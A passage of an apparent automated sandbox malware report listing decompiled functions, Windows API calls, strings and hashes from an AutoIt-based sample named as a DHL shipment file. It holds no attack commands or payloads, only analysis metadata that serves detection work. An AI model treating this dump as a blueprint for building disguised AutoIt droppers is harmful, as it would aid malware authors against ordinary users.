                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 1996641542-2594219639
                                                                                        • Opcode ID: 3acfbed86cc1bc2eb8c741313a96444b919769e00e3f6cd6c3bc5d006074f1ad
                                                                                        • Instruction ID: 618160feda563375bd31788a9c2e701a84579be1aaee1ab5070125aacc231376
                                                                                        • Opcode Fuzzy Hash: 3acfbed86cc1bc2eb8c741313a96444b919769e00e3f6cd6c3bc5d006074f1ad
                                                                                        • Instruction Fuzzy Hash: 7A514E71900208FFDB119FA4DC48FAE7B79EF08320F21422AF911AB2A1D7759A41DF94
                                                                                        Function 00C6AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00C6AD1E
                                                                                        • GetDriveTypeW.KERNEL32(?,00C8FAC0,?,\\.\,00C8F910), ref: 00C6ADFB
                                                                                        • SetErrorMode.KERNEL32(00000000,00C8FAC0,?,\\.\,00C8F910), ref: 00C6AF59
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                        • API String ID: 2907320926-4222207086
                                                                                        • Opcode ID: d60cdd43f289168c48f8b070e1174f03e824a4e29a124bfd5300ee14f859313a
                                                                                        • Instruction ID: 286a7447148832ffdba5c5daf69c3a848d86aaea03141e0c74ae927e456be9a8
                                                                                        • Opcode Fuzzy Hash: d60cdd43f289168c48f8b070e1174f03e824a4e29a124bfd5300ee14f859313a
                                                                                        • Instruction Fuzzy Hash: 575163B0648205ABCB24EBA1C9D2DBD73A5EF48700F204166E417B72D1DA719E46FF53
                                                                                        Function 00C89A1C Relevance: 44.2, APIs: 23, Strings: 2, Instructions: 455windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00C89AD2
                                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00C89B8B
                                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00C89BA7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: 0$@U=u
                                                                                        • API String ID: 2326795674-975001249
                                                                                        • Opcode ID: 1d85b7100ce802ecffd9b44a8519ddf4da25a469dc6a464cf95b3cf42172e9af
                                                                                        • Instruction ID: 3eb64dfb34c29eac00fee0fdf46ffbc31ca2a88bb2e0c89b0ad75071ad462c52
                                                                                        • Opcode Fuzzy Hash: 1d85b7100ce802ecffd9b44a8519ddf4da25a469dc6a464cf95b3cf42172e9af
                                                                                        • Instruction Fuzzy Hash: 3102EF30104201AFE729EF14C888BBBBBE4FF49308F08452DF9A5D62A1D735DA45DB5A
                                                                                        Function 00C068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                        • API String ID: 1038674560-86951937
                                                                                        • Opcode ID: 9dae0450504776ce17df6458be316d0f83ea148dad7cdbe2e3a72fee4a9b0987
                                                                                        • Instruction ID: ff490e37258ea5e5bb395bf54fa82780fdb52369d868c040f864bd58c67f13eb
                                                                                        • Opcode Fuzzy Hash: 9dae0450504776ce17df6458be316d0f83ea148dad7cdbe2e3a72fee4a9b0987
                                                                                        • Instruction Fuzzy Hash: 2B8102B0600216BBDF20BE61EC42FBB7768AF05700F044025F945AA5D2EB71DF66E7A1
                                                                                        Function 00C889D5 Relevance: 40.7, APIs: 21, Strings: 2, Instructions: 401windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C88AC1
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C88AD2
                                                                                        • CharNextW.USER32(0000014E), ref: 00C88B01
                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C88B42
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C88B58
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C88B69
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C88B86
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00C88BD8
                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C88BEE
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C88C1F
                                                                                        • _memset.LIBCMT ref: 00C88C44
                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C88C8D
                                                                                        • _memset.LIBCMT ref: 00C88CEC
                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C88D16
                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C88D6E
                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00C88E1B
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00C88E3D
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C88E87
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C88EB4
                                                                                        • DrawMenuBar.USER32(?), ref: 00C88EC3
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00C88EEB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                        • String ID: 0$@U=u
                                                                                        • API String ID: 1073566785-975001249
                                                                                        • Opcode ID: e7d0275072ee8f929dd5f185e6c7ef8cf2e3220ab42ad95165d95c4925c1b5b5
                                                                                        • Instruction ID: 75d1dadbda6c8f2ba6bae87b44ddc3cbf65005c20ca019cf47ae6520fcdda5bc
                                                                                        • Opcode Fuzzy Hash: e7d0275072ee8f929dd5f185e6c7ef8cf2e3220ab42ad95165d95c4925c1b5b5
                                                                                        • Instruction Fuzzy Hash: E4E1B370900218AFDF20EF51CC84FEE7BB9EF05714F50815AFA25AA590DB709A89DF64
                                                                                        Function 00C8488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 00C849CA
                                                                                        • GetDesktopWindow.USER32 ref: 00C849DF
                                                                                        • GetWindowRect.USER32(00000000), ref: 00C849E6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C84A48
                                                                                        • DestroyWindow.USER32(?), ref: 00C84A74
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C84A9D
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C84ABB
                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C84AE1
                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00C84AF6
                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C84B09
                                                                                        • IsWindowVisible.USER32(?), ref: 00C84B29
                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C84B44
                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C84B58
                                                                                        • GetWindowRect.USER32(?,?), ref: 00C84B70
                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00C84B96
                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00C84BB0
                                                                                        • CopyRect.USER32(?,?), ref: 00C84BC7
                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00C84C32
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                        • String ID: ($0$tooltips_class32
                                                                                        • API String ID: 698492251-4156429822
                                                                                        • Opcode ID: 3e0e7bd34cf98062f80a51b9ca73a8ff9eba5feb3f40fe5b01954ff83ed6bdc3
                                                                                        • Instruction ID: f48c953c3faf00fe0a9b9f63f2f0f4e171a922f29a64e039ed1751d0b28a0ef4
                                                                                        • Opcode Fuzzy Hash: 3e0e7bd34cf98062f80a51b9ca73a8ff9eba5feb3f40fe5b01954ff83ed6bdc3
                                                                                        • Instruction Fuzzy Hash: 6AB18C71608341AFDB08EF64C844B6ABBE4FF88314F008A1CF5999B2A1D771ED05DB59
                                                                                        Function 00C6449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C644AC
                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C644D2
                                                                                        • _wcscpy.LIBCMT ref: 00C64500
                                                                                        • _wcscmp.LIBCMT ref: 00C6450B
                                                                                        • _wcscat.LIBCMT ref: 00C64521
                                                                                        • _wcsstr.LIBCMT ref: 00C6452C
                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C64548
                                                                                        • _wcscat.LIBCMT ref: 00C64591
                                                                                        • _wcscat.LIBCMT ref: 00C64598
                                                                                        • _wcsncpy.LIBCMT ref: 00C645C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                        • API String ID: 699586101-1459072770
                                                                                        • Opcode ID: c80eda48f23a26f147ee737430eedff179462a9e622595bec092045a9ae3b136
                                                                                        • Instruction ID: ff74e7c81a77d287e63450d4ff1d4ab49f3c586b997afb0ad5cbb5ded4ec933d
                                                                                        • Opcode Fuzzy Hash: c80eda48f23a26f147ee737430eedff179462a9e622595bec092045a9ae3b136
                                                                                        • Instruction Fuzzy Hash: 8241F7319002147BDB24BB74EC87EFF776CDF42710F14046AF905E6582EA749A02A7A9
                                                                                        Function 00C027D9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C028BC
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00C028C4
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C028EF
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00C028F7
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00C0291C
                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C02939
                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C02949
                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C0297C
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C02990
                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00C029AE
                                                                                        • GetStockObject.GDI32(00000011), ref: 00C029CA
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C029D5
                                                                                          • Part of subcall function 00C02344: GetCursorPos.USER32(?), ref: 00C02357
                                                                                          • Part of subcall function 00C02344: ScreenToClient.USER32(00CC57B0,?), ref: 00C02374
                                                                                          • Part of subcall function 00C02344: GetAsyncKeyState.USER32(00000001), ref: 00C02399
                                                                                          • Part of subcall function 00C02344: GetAsyncKeyState.USER32(00000002), ref: 00C023A7
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,00C01256), ref: 00C029FC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                        • String ID: @U=u$AutoIt v3 GUI
                                                                                        • API String ID: 1458621304-2077007950
                                                                                        • Opcode ID: 44544f5105b00a54ea0534edcf7f5135a9287c2847e53690b7c607927c6465da
                                                                                        • Instruction ID: acd94a76102bf428781013b087f142750b7ad8a153615ca0e50b71e551d867eb
                                                                                        • Opcode Fuzzy Hash: 44544f5105b00a54ea0534edcf7f5135a9287c2847e53690b7c607927c6465da
                                                                                        • Instruction Fuzzy Hash: 6EB16E75A0020ADFDB14DFA8DC89BAE7BB4FB08314F104229FA15E72D0DB74A951DB54
                                                                                        Function 00C8BA33 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 130filecommemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00C8BA56
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00C8BA6D
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00C8BA78
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00C8BA85
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00C8BA8E
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00C8BA9D
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00C8BAA6
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00C8BAAD
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00C8BABE
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C92CAC,?), ref: 00C8BAD7
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00C8BAE7
                                                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00C8BB0B
                                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00C8BB36
                                                                                        • DeleteObject.GDI32(00000000), ref: 00C8BB5E
                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C8BB74
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                        • String ID: @U=u
                                                                                        • API String ID: 3840717409-2594219639
                                                                                        • Opcode ID: 2e52d2315ed56ca309ef1de6210085ad424e17067ed72b8e3c8c23dc34c45126
                                                                                        • Instruction ID: d3448f76ca5c73a2dd5ad24d8cfa31902dae9089b4399e8f24a88dc13f7b7e4c
                                                                                        • Opcode Fuzzy Hash: 2e52d2315ed56ca309ef1de6210085ad424e17067ed72b8e3c8c23dc34c45126
                                                                                        • Instruction Fuzzy Hash: 8D412675600209EFDB21AF65DC88FAEBBB8FB89715F104068F915D7260D7309E02DB64
                                                                                        Function 00C5A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C5A47A
                                                                                        • __swprintf.LIBCMT ref: 00C5A51B
                                                                                        • _wcscmp.LIBCMT ref: 00C5A52E
                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C5A583
                                                                                        • _wcscmp.LIBCMT ref: 00C5A5BF
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00C5A5F6
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00C5A648
                                                                                        • GetWindowRect.USER32(?,?), ref: 00C5A67E
                                                                                        • GetParent.USER32(?), ref: 00C5A69C
                                                                                        • ScreenToClient.USER32(00000000), ref: 00C5A6A3
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C5A71D
                                                                                        • _wcscmp.LIBCMT ref: 00C5A731
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00C5A757
                                                                                        • _wcscmp.LIBCMT ref: 00C5A76B
                                                                                          • Part of subcall function 00C2362C: _iswctype.LIBCMT ref: 00C23634
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                        • String ID: %s%u
                                                                                        • API String ID: 3744389584-679674701
                                                                                        • Opcode ID: 96a89a5ba242d1db1a6204db5ac4365955ed7d0b1bdf2963f0f2ef76e6e5ba02
                                                                                        • Instruction ID: 46692ce373217fad766d13b070c729db1bdaf3f396baa3323706c151b92f0917
                                                                                        • Opcode Fuzzy Hash: 96a89a5ba242d1db1a6204db5ac4365955ed7d0b1bdf2963f0f2ef76e6e5ba02
                                                                                        • Instruction Fuzzy Hash: 56A1C335204606AFD714DF61C884FAAB7E8FF48356F044629FDA9C2150DB30EA99CB96
                                                                                        Function 00C5AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00C5AF18
                                                                                        • _wcscmp.LIBCMT ref: 00C5AF29
                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C5AF51
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00C5AF6E
                                                                                        • _wcscmp.LIBCMT ref: 00C5AF8C
                                                                                        • _wcsstr.LIBCMT ref: 00C5AF9D
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00C5AFD5
                                                                                        • _wcscmp.LIBCMT ref: 00C5AFE5
                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C5B00C
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00C5B055
                                                                                        • _wcscmp.LIBCMT ref: 00C5B065
                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00C5B08D
                                                                                        • GetWindowRect.USER32(00000004,?), ref: 00C5B0F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1396729323.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1396685593.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396795107.0000000000CB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1396853358.0000000000CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1397201387.0000000000CC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_c00000_DHL 30312052024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                        • String ID: @$ThumbnailClass
                                                                                        • API String ID: 1788623398-1539354611
                                                                                        • Opcode ID: 1aa83ee8441e9da89ab95f656471ce5b9149445ca5711a06199f22f49be0f568
                                                                                        • Instruction ID: a7ecf0b102e48c8fb3aceb28b73a4dfa33bfb68e45e8c4e80d97307dc5f72bc8
                                                                                        • Opcode Fuzzy Hash: 1aa83ee8441e9da89ab95f656471ce5b9149445ca5711a06199f22f49be0f568
                                                                                        • Instruction Fuzzy Hash: F181D1751083059FDB04DF11C881FABBBE8EF94315F048669FD958A092DB34DE89CBA5
                                                                                        Function 00C8A1B9 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 205windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00C8A259
                                                                                        • DestroyWindow.USER32(?,?), ref: 00C8A2D3
                                                                                          • Part of subcall function 00C07BCC: _memmove.LIBCMT ref: 00C07C06
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C8A34D
                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C8A36F
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C8A382
                                                                                        • DestroyWindow.USER32(00000000), ref: 00C8A3A4
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C00000,00000000), ref: 00C8A3DB
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C8A3F4
